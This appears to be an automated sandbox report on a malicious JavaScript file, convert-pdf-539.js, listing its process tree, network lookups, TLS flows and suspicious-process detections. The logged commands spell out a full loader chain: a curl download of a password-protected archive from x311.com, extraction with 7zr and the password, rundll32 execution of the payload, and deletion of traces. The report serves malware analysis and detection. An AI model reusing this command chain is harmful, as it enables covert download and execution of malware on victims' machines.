Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Sept. 14, 2023, 2:30 p.m. | Sept. 14, 2023, 2:33 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js
3044-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
2188 -
cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
2252 -
-
curl.exe curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location
1684
-
-
curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
664 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
2264-
et.o "C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h"
1732
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
2420 -
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
1116 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
2344 -
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
2460-
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
2616
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
2972
-
Name | Response | Post-Analysis Lookup |
---|---|---|
restohalto.site | ||
www.7-zip.org | 49.12.202.237 | |
x311.com | 209.59.190.160 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.102:49169 209.59.190.160:443 |
None | None | None |
TLS 1.3 192.168.56.102:49173 49.12.202.237:443 |
None | None | None |
file | C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat |
cmdline | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" |
cmdline | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w"" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" |
cmdline | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w"" |
cmdline | cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
file | C:\Users\test22\AppData\Local\Temp\et.o |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" |
file | C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat |
file | C:\Users\test22\AppData\Local\Temp\cumque.h |
file | C:\Users\test22\AppData\Local\Temp\et.o |
parent_process | wscript.exe | martian_process | cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" | ||||||
parent_process | wscript.exe | martian_process | curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | rundll32 "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w"" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w"" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l" |
file | C:\Windows\System32\cmd.exe |
file | C:\util\curl\curl.exe |
file | C:\Windows\System32\rundll32.exe |